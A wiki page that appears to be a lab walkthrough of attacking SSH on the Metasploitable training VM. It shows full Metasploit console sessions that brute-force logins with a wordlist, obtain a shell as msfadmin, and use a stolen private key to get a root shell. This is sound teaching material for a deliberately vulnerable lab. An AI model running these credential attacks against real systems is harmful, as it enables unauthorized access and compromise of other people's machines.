Metasploitable/SSH/Exploits

From charlesreid1

Revision as of 17:47, 26 March 2016 by Admin (talk | contribs) (→‎Flags)

SSH Service Info

First, a reminder of the information nmap returned about the SSH service after a port scan: 

22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

This server isn't using the 1.0 protocol, which is hopelessly broken and easy to defeat. This means getting past SSH will be (at least) mildly challenging.

Links with Background Info

Here is some good background info two SSH attacks: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

The first attack is ssh_login, which allows you to use metasploit to brute-force guess SSH login credentials.

  • Module name is auxiliary/scanner/ssh/ssh_login

The second attack requires a private key. If you do gain access to the private SSH keys on a machine, you can attempt to authenticate with a large number of hosts and services using that private key.

  • Module name is auxiliary/scanner/ssh/ssh_login_pubkey

Brute Force ssh_login

We already covered how to brute force the login with Hydra, Metasploitable/SSH/Brute Force

Did you know you can also brute force an SSH login with Metasploitable? Use the auxiliary/scanner/ssh/ssh_login module. 

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

Set this to run on the Metasploitable virtual box target: 

msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false

Now run the attack: 

msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 - SSH - Starting buteforce
[*] Command shell session 1 opened (?? -> ??) at 2016-03-26 17:25:18 -0600
[+] 10.0.0.27:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

At this point, we can create a session with the machine that we compromised. Here we execute some commands as user msfadmin, to see what groups we're in: 

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '
exit
[*] Command shell session 1 closed.
msf auxiliary(ssh_login) >

Private Key ssh_login_pubkey

If you manage to get your hands on a private key... 

msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   KEY_FILE                           no        Filename of one or several cleartext private keys.
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login_pubkey) > set KEY_FILE /tmp/id_rsa
KEY_FILE => /tmp/id_rsa
msf auxiliary(ssh_login_pubkey) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login_pubkey) > set RHOSTS 192.168.1.154
RHOSTS => 192.168.1.154
msf auxiliary(ssh_login_pubkey) > run

[*] 192.168.1.154:22 - SSH - Testing Cleartext Keys
[*] 192.168.1.154:22 - SSH - Trying 1 cleartext key per user.
[*] Command shell session 1 opened (?? -> ??) at 2010-09-09 17:17:56 -0600
[+] 192.168.1.154:22 - SSH - Success: 'root':'57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login_pubkey) > sessions -i 1
[*] Starting interaction with 1...

ls
reset_logs.sh
id
uid=0(root) gid=0(root) groups=0(root)
exit
[*] Command shell session 1 closed.
msf auxiliary(ssh_login_pubkey) >



Flags


Defcon.png
Metasploit
any and all resources related to metasploit on this wiki


MSF - on the metasploit framework generally

Category:Metasploit - pages labeled with the "Metasploit" category label

MSF/Wordlists - wordlists that come bundled with Metasploit

MSFVenom - msfvenom is used to craft payloads

Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.


Category:Security  · Category:Metasploit  · Category:Kali


Flags  · Template:MetasploitFlag  · e





Defcon.png
Metasploitable: The Red Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.


Metasploitable Databases:

Exploiting MySQL with Metasploit: Metasploitable/MySQL

Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres


Metasploitable Networking:

Exploiting VSFTP Backdoor: Metasploitable/VSFTP

SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force

SSH Penetration with Keys: Metasploitable/SSH/Keys

SSH Penetration with Metasploit: Metasploitable/SSH/Exploits

Brute-Forcing /etc/shadow File: Metasploitable/John Shadow File

Exploiting NFS: Metasploitable/NFS

Exploiting DNS Bind Server: Metasploitable/DNS Bind


Metasploitable Services:

distcc: Metasploitable/distcc


Metasploitable Apache:

Exploiting Apache (with Metasploit): Metasploitable/Apache

Exploiting Apache (with Python): Metasploitable/Apache/Python

Tor's Hammer DoS Attack: Metasploitable/TorsHammer *

Apache DAV: Metasploitable/Apache/DAV *

Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote


Metasploitable Memory:

General approach to memory-based attacks: Metasploitable/Memory

Investigating memory data: Metasploitable/Volatile Data Investigation

Dumping Memory from Metasploit: Metasploitable/Dumping Memory


Metasploitable Fuzzing:

(Have not done much work on fuzzing Metasploitable...)

Fuzzing  · American Fuzzy Lop


Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali


Flags  · Template:MetasploitableRedTeamFlag  · e




Defcon.png
Metasploitablue: The Blue Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.

Hence the name, Metasploita-blue.

Overview: Metasploitable/Defenses

Metasploitable/Defenses/Stopping  · Metasploitable/Defenses/Detecting


Metasploitable On-Machine Defenses:

Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation

Linux Artifact Investigation: Metasploitable/Artifact Investigation

Linux Iptables Essentials: Metasploitable/Iptables

Firewall Assurance and Testing: Metasploitable/Firewall

Password Assessment: Metasploitable/Password Assessment

Standard Unix Ports: Unix/Ports


Metasploitable Networking Defenses:

Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat

Nmap (Blue Team): Metasploitable/Nmap

Network Traffic Analysis: Metasploitable/Network Traffic Analysis

Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns

Snort IDS: Metasploitable/Snort


Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali


Flags  · Template:MetasploitableBlueTeamFlag  · e



Retrieved from "https://charlesreid1.com/w/index.php?title=Metasploitable/SSH/Exploits&oldid=9885"